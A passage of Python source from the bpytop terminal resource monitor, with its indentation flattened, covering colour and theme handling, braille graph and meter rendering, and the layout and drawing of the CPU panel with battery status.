name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True):
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True):
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = out
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True):
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
color = f'\033[{dint};2;{c};{c};{c}m'
elif len(hexa) == 7:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
except ValueError as e:
errlog.exception(f'{e}')
else:
color = f'\033[{dint};2;{r};{g};{b}m'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = NotImplemented
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = False if item not in ["main_fg", "main_bg"] else True
depth = "fg" if item not in ["main_bg", "selected_bg"] else "bg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
for _ in range(101):
self.gradient[name] += [c]
#* Set terminal colors
Term.fg = self.main_fg
Term.bg = self.main_bg if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path) as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if n > 5 and n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
height_p: int
width_p: int
x: int
y: int
width: int
height: int
proc_mode: bool = True if (CONFIG.view_mode == "proc" and not ARG_MODE) or ARG_MODE == "proc" else False
stat_mode: bool = True if (CONFIG.view_mode == "stat" and not ARG_MODE) or ARG_MODE == "stat" else False
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
resized: bool = False
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
CpuBox.redraw = True
CpuBox._draw_fg()
Draw.out("cpu")
@classmethod
def draw_clock(cls, force: bool = False):
if force: pass
elif not cls.clock_on or Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
cls.clock = strftime(CONFIG.draw_clock)
clock_len = len(cls.clock[:(CpuBox.width-58)])
now: bool = False if Menu.active else not force
Draw.buffer("clock", (f'{Mv.to(CpuBox.y, ((CpuBox.width-2)//2)-(clock_len//2)-3)}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * 4}'
f'{Symbol.title_left}{Fx.b}{THEME.title(cls.clock[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Symbol.h_line * 4}{Term.fg}'),
z=1, now=now, once=not force, only_save=Menu.active)
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
Draw.buffer("bg", "".join(sub._draw_bg() for sub in cls.__subclasses__()), now=now, z=1000, only_save=Menu.active, once=True) # type: ignore
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
x = 1
y = 1
height_p = 32
width_p = 100
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
cpu = CpuCollector
height_p: int
if cls.proc_mode: height_p = 20
else: height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
return False
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if os.path.isfile("/sys/class/power_supply/BAT0/status"):
try:
with open("/sys/class/power_supply/BAT0/status", "r") as file:
status = file.read().strip()
except:
pass
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
if return_true or cls.resized or cls.redraw:
return True
else:
return False
@classmethod
def _draw_fg(cls):
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{ARG_MODE or CONFIG.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
if cls.battery_status == "Charging":
battery_symbol: str = "▲"
elif cls.battery_status == "Discharging":
battery_symbol = "▼"
elif cls.battery_status in ["Full", "Not charging"]:
battery_symbol = "■"
else:
battery_symbol = "○"
battery_pos = cls.width - len(f'{CONFIG.update_ms}') - 17 - (11 if cls.width >= 100 else 0) - len(battery_time) - len(f'{cls.battery_percent}')
if battery_pos != cls.old_battery_pos and cls.old_battery_pos > 0 and not cls.resized:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(15 if cls.width >= 100 else 5))}'
cls.old_battery_pos = battery_pos
out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size)}{Mv.l(5 * cls.column_size)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy == bh:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
